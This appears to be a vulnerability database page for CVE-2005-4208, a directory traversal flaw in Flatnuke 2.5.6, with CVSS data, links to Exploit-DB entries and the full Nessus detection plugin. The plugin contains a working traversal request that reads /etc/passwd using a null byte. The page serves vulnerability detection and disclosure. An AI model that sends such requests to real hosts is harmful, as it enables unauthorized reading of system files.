Vulnerabilities > CVE-2005-4208 - Directory Traversal vulnerability in Flatnuke 2.5.6

CVSS 5.0 - MEDIUM

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

PARTIAL

Integrity impact

NONE

Availability impact

NONE

network

low complexity

flatnuke

nessus

exploit available

NVD

Published: 2005-12-13

Updated: 2018-10-19

Summary

Directory traversal vulnerability in Flatnuke 2.5.6 allows remote attackers to access arbitrary files via a .. (dot dot) and null byte (%00) in the id parameter of the read module.

Vulnerable Configurations

Part	Description	Count
Application	Flatnuke Flatnuke Flatnuke 2.5.6	1

Exploit-Db

description	Flatnuke 2.5.6 Privilege Escalation / Remote Commands Execution Exploit. CVE-2005-4208,CVE-2005-4449. Webapps exploit for php platform
id	EDB-ID:1367
last seen	2016-01-31
modified	2005-12-10
published	2005-12-10
reporter	rgod
source	https://www.exploit-db.com/download/1367/
title	Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit

description	Flatnuke <= 2.5.5 Remote Code Execution. CVE-2005-2540,CVE-2005-4208. Webapps exploit for php platform
id	EDB-ID:1140
last seen	2016-01-31
modified	2005-08-08
published	2005-08-08
reporter	rgod
source	https://www.exploit-db.com/download/1140/
title	Flatnuke <= 2.5.5 - Remote Code Execution

Nessus

NASL family	CGI abuses
NASL id	FLATNUKE_ID_DIR_TRAVERSAL.NASL
description	The remote host is running FlatNuke, a content management system written in PHP and using flat files rather than a database for its storage. The version of FlatNuke installed on the remote host suffers fails to remove directory traversal sequences user input to the
last seen	2020-06-01
modified	2020-06-02
plugin id	20293
published	2005-12-12
reporter	This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/20293
title	FlatNuke index.php id Parameter Traversal Arbitrary File Access
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(20293); script_version("1.24"); script_cvs_date("Date: 2018/11/15 20:50:17"); script_cve_id("CVE-2005-2813", "CVE-2005-4208"); script_bugtraq_id(14702, 15796); script_name(english:"FlatNuke index.php id Parameter Traversal Arbitrary File Access"); script_summary(english:"Checks for id parameter directory traversal vulnerability in FlatNuke"); script_set_attribute(attribute:"synopsis", value: "The remote web server contains a PHP application that is affected by a directory traversal vulnerability." ); script_set_attribute(attribute:"description", value: "The remote host is running FlatNuke, a content management system written in PHP and using flat files rather than a database for its storage. The version of FlatNuke installed on the remote host suffers fails to remove directory traversal sequences user input to the 'id' parameter of the 'index.php' script. Provided PHP's 'magic_quotes_gpc' setting is enabled, an attacker can leverage this flaw to read arbitrary files on the remote host subject to the privileges of the web server user id." ); script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Dec/107" ); script_set_attribute(attribute:"solution", value: "Enable PHP's 'magic_quotes_gpc' setting." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "2005/12/12"); script_set_attribute(attribute:"vuln_publication_date", value: "2005/08/30"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("http_version.nasl"); script_exclude_keys("Settings/disable_cgi_scanning"); script_require_ports("Services/www", 80); script_require_keys("www/PHP"); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("data_protection.inc"); port = get_http_port(default:80, embedded: 0); if (!can_host_php(port:port)) exit(0); # Loop through directories. if (thorough_tests) dirs = list_uniq(make_list("/flatnuke", cgi_dirs())); else dirs = make_list(cgi_dirs()); foreach dir (dirs) { # Try to exploit the flaw to read a file. file = "../../../../../../../../../../../../../etc/passwd"; u = string( dir, "/?", "mod=read&", "id=", file, "%00" ); r = http_send_recv3(port:port, method: "GET", item: u); if (isnull(r)) exit(0); # There's a problem if there's an entry for root. if (egrep(pattern:"root:.*:0:[01]:", string: r[2])) { output = strstr(r[2], 'read.png" alt="Read"> '); if (output) output = output - 'read.png" alt="Read"> '; if (output) output = output - strstr(output, '</font></td>'); if (isnull(output)) output = r[2]; output = data_protection::redact_etc_passwd(output:output); report = '\n'; foreach line (split(output, keep: 0)) report = strcat(report, clean_string(s: line), '\n'); security_warning(port:port, extra: report); exit(0); } }

Summary

Vulnerable Configurations

Exploit-Db

Nessus

References